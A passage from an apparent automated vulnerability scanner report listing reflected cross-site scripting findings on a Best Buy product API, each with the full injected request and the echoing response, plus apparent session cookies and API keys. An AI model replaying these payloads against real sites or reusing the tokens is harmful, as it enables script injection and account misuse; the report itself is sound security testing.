Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "e8382132aec443124d5e36b9cead5d75"
X-Runtime: 4
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Thu, 11 Aug 2011 23:47:21 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
: "Couldn't understand '/v1/products(digitalSku>\"\"&sku in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=9933863<script>alert(1)</script>d7fd7ee2f10&format=json'",
"status": "400 Bad Request"
}
})

1.164. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [show parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The value of the show request parameter is copied into the HTML document as plain text between tags. The payload 7bf34<script>alert(1)</script>10daab6be was submitted in the show parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku7bf34<script>alert(1)</script>10daab6be&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "c8a1aaf1166b56e42431a4111d6f647a"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2388
Date: Thu, 11 Aug 2011 23:47:17 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(digitalSku>\"\"&sku in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku7bf34<script>alert(1)</script>10daab6be&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'",
"status": "400 Bad Request"
}
})

1.165. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c06e<script>alert(1)</script>0dcbfca45d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v17c06e<script>alert(1)</script>0dcbfca45d0/products(sku%20in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; 
CART=H4sIAAAAAAAAAJVTy27TQBS9SZu+G9pGLJEqPsBt0gcpLFBIHwTSJpCiStmgiX2TDJ2HOx6HmAUCiT1rBPwBm34FG9gg8RmwYceKGddOUyQWeGFZx+eee86duZ9+QC5QcNuV3OlgoDth5Hi0RzUqRRyDclQuOlJ5qBxfSReDQCqnKuUpxYZFV3+9f/vl/On9LEzUYYVXk5KaRl4TXRloWKo/IwOyFmrK1uo00HfqkOcNZbqIRjfW0LBywWFE9NZaWlHRM6wcP458PIOXkB36xmXBchyr41SMvciKDV9/u/HuM/k4AZkaTAb0BQ59AMg8nzTvOVN097+jXQ1wHg633zQ2+1m4WYP5LuGURS08O5JtmKLNvhRYgzyjAg0YonDxSO6afFUpTIxOqLHCdRtm+AHt6sOgZz+bVLv9mngAs/xRSISmOqrDdbdPmfd3dxs+U4cldwwfDaUOc65tQ1xd8xKk4OGAuriPRIcKK54nRZCILCAnlBlImaQJfeEU0d8bmkGakSfYPK8STZjsPcQogRZT6DF2R62m+J4VTK3wfaoCfUQ4jnRs5jhJWrJwMQbTn/Su0pixMKJNXFbk02lV3LGUc7yppBeOIdd4q09936Q4RN2XKTzDW1oqHJM7Ieb4hY5amujUwgo/UQYaH34a3DdXsiFY1FRmqlfv6a4MOwzNPZ21pJhgq6ZNVwuMHVM+QGVPpaKQtKmfWg6M42MZG9xnpKehMKZ+T0qGRBj5QuCjSwnbRUYHqCLLTSSWkl/xFqX4TLwB/3gyfvxoyKF4+qSlYbq8WSyVdkoJnHfpxs7O1q3N9fX1cqlskMVisVwsbxS3tsulzZKGqQMlQ+FpgAsps2PL8WJa205i++uqevX9w++fWci0ITcgLLR7abp2CQvisSwPTW8PuyRk+vLrD2JlK3iQBAAA; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "4748658f3be8e8a60938f067866e228d"
X-Runtime: 1
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2456
Date: Thu, 11 Aug 2011 23:50:22 GMT

busopsLow.BTP.retLoadBTPSKUs({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<Your
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v17c06e<script>alert(1)</script>0dcbfca45d0/products(sku in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoad
...[SNIP]...

1.166. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 820c8<script>alert(1)</script>201fb407b6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(sku%20in(8412292)820c8<script>alert(1)</script>201fb407b6d&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=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; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web3.ATL
Etag: "db87ee437c972e7c7b84f17d46703a82"
X-Runtime: 2
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2456
Date: Thu, 11 Aug 2011 23:50:25 GMT

busopsLow.BTP.retLoadBTPSKUs({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<Your
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(sku in(8412292)820c8<script>alert(1)</script>201fb407b6d&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&forma
...[SNIP]...

1.167. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 564de<script>alert(1)</script>39279c9f405 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(sku%20in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs564de<script>alert(1)</script>39279c9f405&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; 
CART=H4sIAAAAAAAAAJVTy27TQBS9SZu+G9pGLJEqPsBt0gcpLFBIHwTSJpCiStmgiX2TDJ2HOx6HmAUCiT1rBPwBm34FG9gg8RmwYceKGddOUyQWeGFZx+eee86duZ9+QC5QcNuV3OlgoDth5Hi0RzUqRRyDclQuOlJ5qBxfSReDQCqnKuUpxYZFV3+9f/vl/On9LEzUYYVXk5KaRl4TXRloWKo/IwOyFmrK1uo00HfqkOcNZbqIRjfW0LBywWFE9NZaWlHRM6wcP458PIOXkB36xmXBchyr41SMvciKDV9/u/HuM/k4AZkaTAb0BQ59AMg8nzTvOVN097+jXQ1wHg633zQ2+1m4WYP5LuGURS08O5JtmKLNvhRYgzyjAg0YonDxSO6afFUpTIxOqLHCdRtm+AHt6sOgZz+bVLv9mngAs/xRSISmOqrDdbdPmfd3dxs+U4cldwwfDaUOc65tQ1xd8xKk4OGAuriPRIcKK54nRZCILCAnlBlImaQJfeEU0d8bmkGakSfYPK8STZjsPcQogRZT6DF2R62m+J4VTK3wfaoCfUQ4jnRs5jhJWrJwMQbTn/Su0pixMKJNXFbk02lV3LGUc7yppBeOIdd4q09936Q4RN2XKTzDW1oqHJM7Ieb4hY5amujUwgo/UQYaH34a3DdXsiFY1FRmqlfv6a4MOwzNPZ21pJhgq6ZNVwuMHVM+QGVPpaKQtKmfWg6M42MZG9xnpKehMKZ+T0qGRBj5QuCjSwnbRUYHqCLLTSSWkl/xFqX4TLwB/3gyfvxoyKF4+qSlYbq8WSyVdkoJnHfpxs7O1q3N9fX1cqlskMVisVwsbxS3tsulzZKGqQMlQ+FpgAsps2PL8WJa205i++uqevX9w++fWci0ITcgLLR7abp2CQvisSwPTW8PuyRk+vLrD2JlK3iQBAAA; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "7e4ec97c16be3ce5d171449ceacb15d0"
X-Runtime: 35
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 485
Date: Thu, 11 Aug 2011 23:50:11 GMT

busopsLow.BTP.retLoadBTPSKUs564de<script>alert(1)</script>39279c9f405({
"queryTime": "0.005",
"currentPage": 1,
"totalPages": 0,
"partial": false,
"from": 1,
"total": 0,
"to": 0,
"products": [

],
"canonicalUrl": "/v1/products(sku in(8412292)&(depart
...[SNIP]...

1.168. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 82b98<script>alert(1)</script>79e8fa433a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(sku%20in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json&82b98<script>alert(1)</script>79e8fa433a0=1 HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=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; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web3.ATL
Etag: "7f4e0f2b8eda632249293d791be5f98f"
X-Runtime: 4
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2459
Date: Thu, 11 Aug 2011 23:50:19 GMT

busopsLow.BTP.retLoadBTPSKUs({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<Your
...[SNIP]...
tmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json&82b98<script>alert(1)</script>79e8fa433a0=1'",
"status": "400 Bad Request"
}
})

